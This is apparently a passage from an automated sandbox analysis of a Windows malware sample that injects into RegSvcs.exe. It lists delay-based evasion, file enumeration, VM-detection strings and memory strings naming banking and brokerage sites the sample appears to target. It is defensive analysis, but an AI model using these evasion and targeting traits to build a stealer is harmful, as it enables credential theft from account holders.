                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595953Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595843Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595734Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595625Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595515Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595406Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595297Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595135Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594936Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594719Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594594Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594484Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594374Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594265Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594151Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594028Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599875Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599766Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599568Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599434Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599315Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599188Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599079Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598954Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598829Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598719Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598594Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598485Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598360Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598235Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598110Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597985Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597860Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597735Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597610Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597485Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597360Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597235Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597110Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596985Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596860Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596735Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596610Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596485Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596360Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596235Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596110Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595985Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595860Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595735Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595610Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595485Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595360Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595235Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595110Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594985Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594860Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594735Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594610Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594485Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594360Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594235Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594110Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593985Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593860Jump to behavior
                  Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 2541Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 7300Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 1819Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 7992Jump to behavior
                  Source: C:\Users\user\Desktop\ty1nyFUMlo.exeAPI coverage: 4.0 %
                  Source: C:\Users\user\AppData\Local\translucently\enterogenous.exeAPI coverage: 4.2 %
                  Source: C:\Users\user\Desktop\ty1nyFUMlo.exeCode function: 0_2_0057DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,0_2_0057DBBE
                  Source: C:\Users\user\Desktop\ty1nyFUMlo.exeCode function: 0_2_0054C2A2 FindFirstFileExW,0_2_0054C2A2
                  Source: C:\Users\user\Desktop\ty1nyFUMlo.exeCode function: 0_2_005868EE FindFirstFileW,FindClose,0_2_005868EE
                  Source: C:\Users\user\Desktop\ty1nyFUMlo.exeCode function: 0_2_0058698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,0_2_0058698F
                  Source: C:\Users\user\Desktop\ty1nyFUMlo.exeCode function: 0_2_0057D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0057D076
                  Source: C:\Users\user\Desktop\ty1nyFUMlo.exeCode function: 0_2_0057D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0057D3A9
                  Source: C:\Users\user\Desktop\ty1nyFUMlo.exeCode function: 0_2_00589642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00589642
                  Source: C:\Users\user\Desktop\ty1nyFUMlo.exeCode function: 0_2_0058979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0058979D
                  Source: C:\Users\user\Desktop\ty1nyFUMlo.exeCode function: 0_2_00589B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00589B2B
                  Source: C:\Users\user\Desktop\ty1nyFUMlo.exeCode function: 0_2_00585C97 FindFirstFileW,FindNextFileW,FindClose,0_2_00585C97
                  Source: C:\Users\user\AppData\Local\translucently\enterogenous.exeCode function: 2_2_00A9DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,2_2_00A9DBBE
                  Source: C:\Users\user\AppData\Local\translucently\enterogenous.exeCode function: 2_2_00A6C2A2 FindFirstFileExW,2_2_00A6C2A2
                  Source: C:\Users\user\AppData\Local\translucently\enterogenous.exeCode function: 2_2_00AA68EE FindFirstFileW,FindClose,2_2_00AA68EE
                  Source: C:\Users\user\AppData\Local\translucently\enterogenous.exeCode function: 2_2_00AA698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,2_2_00AA698F
                  Source: C:\Users\user\AppData\Local\translucently\enterogenous.exeCode function: 2_2_00A9D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,2_2_00A9D076
                  Source: C:\Users\user\AppData\Local\translucently\enterogenous.exeCode function: 2_2_00A9D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,2_2_00A9D3A9
                  Source: C:\Users\user\AppData\Local\translucently\enterogenous.exeCode function: 2_2_00AA9642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_00AA9642
                  Source: C:\Users\user\AppData\Local\translucently\enterogenous.exeCode function: 2_2_00AA979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_00AA979D
                  Source: C:\Users\user\AppData\Local\translucently\enterogenous.exeCode function: 2_2_00AA9B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,2_2_00AA9B2B
                  Source: C:\Users\user\AppData\Local\translucently\enterogenous.exeCode function: 2_2_00AA5C97 FindFirstFileW,FindNextFileW,FindClose,2_2_00AA5C97
                  Source: C:\Users\user\Desktop\ty1nyFUMlo.exeCode function: 0_2_005142DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_005142DE
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599890Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599781Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599672Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599562Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599453Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599343Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599234Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599125Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599015Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598904Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598796Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598687Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598578Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598468Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598359Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598250Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598140Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598031Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597922Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597811Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597663Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597547Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597390Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597265Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597156Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597047Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596937Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596828Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596718Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596609Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596500Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596390Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596281Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596172Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596062Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595953Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595843Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595734Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595625Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595515Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595406Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595297Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595135Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594936Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594719Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594594Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594484Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594374Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594265Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594151Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594028Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599875Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599766Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599568Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599434Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599315Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599188Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599079Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598954Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598829Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598719Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598594Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598485Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598360Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598235Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598110Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597985Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597860Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597735Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597610Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597485Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597360Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597235Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597110Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596985Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596860Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596735Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596610Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596485Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596360Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596235Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596110Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595985Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595860Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595735Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595610Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595485Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595360Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595235Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595110Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594985Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594860Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594735Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594610Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594485Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594360Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594235Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594110Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593985Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593860Jump to behavior
                  Source: RegSvcs.exe, 00000007.00000002.3798732418.000000000462A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696497155j
                  Source: RegSvcs.exe, 00000007.00000002.3798732418.000000000462A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696497155
                  Source: RegSvcs.exe, 00000007.00000002.3798732418.000000000462A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696497155t
                  Source: RegSvcs.exe, 00000007.00000002.3798732418.000000000462A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696497155
                  Source: RegSvcs.exe, 00000007.00000002.3798732418.000000000462A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696497155]
                  Source: RegSvcs.exe, 00000003.00000002.3792050147.0000000001457000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlll
                  Source: RegSvcs.exe, 00000007.00000002.3798732418.000000000462A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696497155|UE
                  Source: RegSvcs.exe, 00000007.00000002.3798732418.000000000462A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696497155o
                  Source: RegSvcs.exe, 00000007.00000002.3798732418.000000000462A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696497155
                  Source: RegSvcs.exe, 00000007.00000002.3798732418.000000000462A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696497155
                  Source: RegSvcs.exe, 00000007.00000002.3792119785.0000000001528000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: RegSvcs.exe, 00000007.00000002.3798732418.000000000462A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696497155x
                  Source: RegSvcs.exe, 00000007.00000002.3798732418.000000000462A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696497155
                  Source: RegSvcs.exe, 00000007.00000002.3798732418.000000000462A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696497155h
                  Source: RegSvcs.exe, 00000007.00000002.3798732418.000000000462A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696497155p
                  Source: RegSvcs.exe, 00000007.00000002.3798732418.000000000462A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696497155n
                  Source: RegSvcs.exe, 00000007.00000002.3798732418.000000000462A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696497155d
